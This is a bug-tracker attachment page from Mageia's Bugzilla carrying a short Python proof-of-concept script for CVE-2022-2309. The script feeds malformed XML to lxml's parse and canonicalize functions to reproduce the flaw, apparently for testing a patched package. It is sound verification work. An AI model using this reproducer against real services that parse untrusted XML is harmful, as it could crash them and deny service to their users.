Mageia Bugzilla – Attachment 13787 Details for
Bug 31810
libxml2 new security issues CVE-2023-28484 and CVE-2023-29469
Home
|
New
|
Browse
|
Search
|
[?]
|
Reports
|
Requests
|
Help
|
Log In
[x]
|
New Account
|
Forgot Password
Simplified PoC script for CVE-2022-2309
poc_issue1.py (text/plain), 530 bytes, created by
Len Lawrence
on 2023-04-24 16:39:00 CEST
(
hide
)
Description:
Simplified PoC script for CVE-2022-2309
Filename:
MIME Type:
Creator:
Len Lawrence
Created:
2023-04-24 16:39:00 CEST
Size:
530 bytes
patch
obsolete
>from io import StringIO > >from lxml import etree > > >first_input = """ ><anot xmlns="1"> >""" > >second_input = """ ><root> ></root> >""" > > >def parse_and_canonicalize(raw): > input = StringIO(raw) > try: > et = etree.parse(input) > etree.canonicalize(et) > except etree.XMLSyntaxError as e: > print(e) > > >def reproduce(): > print('parse_and_canonicalize first_input:') > parse_and_canonicalize(first_input) > print('parse_and_canonicalize second_input:') > parse_and_canonicalize(second_input) > > >reproduce() >
from io import StringIO from lxml import etree first_input = """ <anot xmlns="1"> """ second_input = """ <root> </root> """ def parse_and_canonicalize(raw): input = StringIO(raw) try: et = etree.parse(input) etree.canonicalize(et) except etree.XMLSyntaxError as e: print(e) def reproduce(): print('parse_and_canonicalize first_input:') parse_and_canonicalize(first_input) print('parse_and_canonicalize second_input:') parse_and_canonicalize(second_input) reproduce()
View Attachment As Raw
Actions:
View
Attachments on
bug 31810
: 13787